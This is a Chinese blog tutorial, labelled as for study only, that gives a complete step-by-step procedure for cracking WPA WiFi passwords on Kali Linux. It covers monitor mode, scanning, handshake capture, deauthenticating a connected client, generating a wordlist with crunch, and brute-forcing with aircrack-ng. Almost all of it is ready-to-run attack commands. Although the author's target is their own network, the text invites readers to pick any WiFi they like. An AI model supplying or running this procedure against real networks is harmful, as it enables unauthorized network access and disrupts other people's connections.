kalilinux破解WiFi密码(仅供学习使用)
(严禁商业使用,只能用于个人学习使用)
一、安装kalilinux
这部分请详细去看我之前的博客,kalilinux的安装教程,完成安装后,便可以开始跟随我后面的教程了。
安装教程链接,点下就行
二、好戏开始!
2.1
破解前的准备:
1、无线网卡一个(注意:要免驱的那种,USB的就行),我的是淘宝买的,支持网络监听就行。
2、已经安装好的kalilinux。
2.2开始
2.2.1插入网卡,并将网卡连接到虚拟机。
按照如图找到自己的网卡,并点击连接,我这里因为已经连接上,所以提示断开连接
2.2.1.2验证是否连接网卡到自己的虚拟机
若右下角出现该图标即表示网卡连接成功。
2.2.2监测自己的网卡是否支持监听
输入命令:
airmon-ng
这个命令会列出来当前检测到的可以适配的网卡。
我这里的网卡显示是rt2800usb,大家可能跟我的有一点不一样。
2.2.3将自己的网卡调至监听模式
输入命令:``
airmon-ng start wlan0
该命令将网卡调至监听模式,等待一会儿。
2.2.4查看是否已到监听模式
输入命令:
ifconfig
或iwconfig
效果如图:
上图中出现wlan0mon即表示监听模式已开启。
2.2.5扫描当前区域的wifi信号
输入命令:
airodump-ng wlan0mon
该命令会列出当前区域内的WiFi信息。
按Q或者ctrl+c可以停止扫描。
2.2.5.1该步骤可能发生扫描不到任何网络的情况
出现这种情况,建议重新从头再执行一遍,或者将网卡拔出再插一遍,重新执行,一般两到三次即可。
2.2.6选择要破解的WiFi
我这里选择的是自己的WiFi,名字叫cmcc-qnch的WiFi
大家可以选择自己想选择的WiFi。
第一列信息是mac地址,后面要用,大家可以复制下,
我这里是3C:E3:E7:61:AF:2F
其次后面有一列叫ch的是网络的信道,大家要记一下后面会用。
我这里是7
2.2.7开始准备抓取握手包
输入:
airodump-ng -c 7 -w wifibao.cap --bssid 3C:E3:E7:61:AF:2F wlan0mon
-c 指的是信道,就上面我让你们记得
-w 指的是存放握手包密码的文件
–bssid 指的是mac地址
最后加上当前网卡的名称
等待一会儿。
2.2.8另开一个终端,开始强制用户断开重连,获取握手包
输入:
aireplay -0 10 -c D6:8D:4F:8F:C3:1A -a 3C:E3:E7:61:AF:2F wlan0mon
上面的:
-0 指的是断开重连,获得握手包的次数
-c 当前连接此WiFi的用户的mac地址
-a 路由器即你之前获取到的mac地址
2.2.9抓到握手包
出现上述情况表示抓取成功。
2.2.10开始创建自己的密码字典(我为了方便起见,自己生成了能够快速破解且适合自己的,密码字典)
输入:crunch 8 8 -t cubmsgk% -o 1.txt
第一个8是指创建密码字典的密码最小位数,第二个是最大位数,
-t 是指按照格式化生成密码字典
-o 是指将字典输出到某个文件夹中
如果不想自己生成字典,可以用kalilinux自带的字典
先解压:
gzip -d /usr/share/wordlists/rockyou.txt.gz
解压完成,后面就可以用了,记住路径。
2.2.11跑包
输入:aircrack-ng -w 字典路径 握手包路径
等待一会儿。
密码最后就显示出来了,key found中的就是密码。